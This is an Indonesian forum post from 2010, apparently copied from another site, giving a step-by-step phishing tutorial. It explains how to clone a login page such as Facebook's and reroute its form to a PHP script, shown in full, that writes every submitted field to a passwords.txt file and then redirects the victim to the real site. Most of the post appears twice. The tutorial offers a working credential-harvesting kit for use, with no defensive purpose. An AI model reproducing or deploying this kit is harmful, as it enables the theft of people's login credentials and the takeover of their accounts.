Tutor phising
Posted: Sat Jul 24, 2010 1:17 pm
1. pilih site target yg mau dijadiin halaman phising
2. liat source codenya, klik kanan => source bisa juga ctrl+u trus save jadi index.htm
3. buka index.html yg tadi pake notepad, cari kata "action=" biasanya ketemu yg kaya gini
Code:
--------------------------------------------------------------------------
<form action="RANDOM URL" method="post">
--------------------------------------------------------------------------
4. ganti url "RANDOM URL" jadi write.php trus ganti "post" jadi get
5. save
6. bikin "write.php"
Code:
----------------------------------------------------------------------------------------
<?php
header("Location: http://RANDOM.COM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
---------------------------------------------------------------------------------------
7. ganti tulisan yg http://RANDOM.COM diatas jadi alamat yg diphising misal http://facebook.com
8. save
9. upload deh dalam direktori yg sama.
jangan lupe chmod 777 di file password.txt
moga bermanfaat yeee..
by:DNZ
hanya mindahin info artikel dari codenesia...sapa tahu ada yg belom baca atau belum tahu :circle:
sumber: http://codenesia.com/artikel/tutor-phising.aspx
2. liat source codenya, klik kanan => source bisa juga ctrl+u trus save jadi index.htm
3. buka index.html yg tadi pake notepad, cari kata "action=" biasanya ketemu yg kaya gini
Code:
--------------------------------------------------------------------------
<form action="RANDOM URL" method="post">
--------------------------------------------------------------------------
4. ganti url "RANDOM URL" jadi write.php trus ganti "post" jadi get
5. save
6. bikin "write.php"
Code:
----------------------------------------------------------------------------------------
<?php
header("Location: http://RANDOM.COM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
---------------------------------------------------------------------------------------
7. ganti tulisan yg http://RANDOM.COM diatas jadi alamat yg diphising misal http://facebook.com
8. save
9. upload deh dalam direktori yg sama.
jangan lupe chmod 777 di file password.txt
moga bermanfaat yeee..
by:DNZ
hanya mindahin info artikel dari codenesia...sapa tahu ada yg belom baca atau belum tahu :circle:
sumber: http://codenesia.com/artikel/tutor-phising.aspx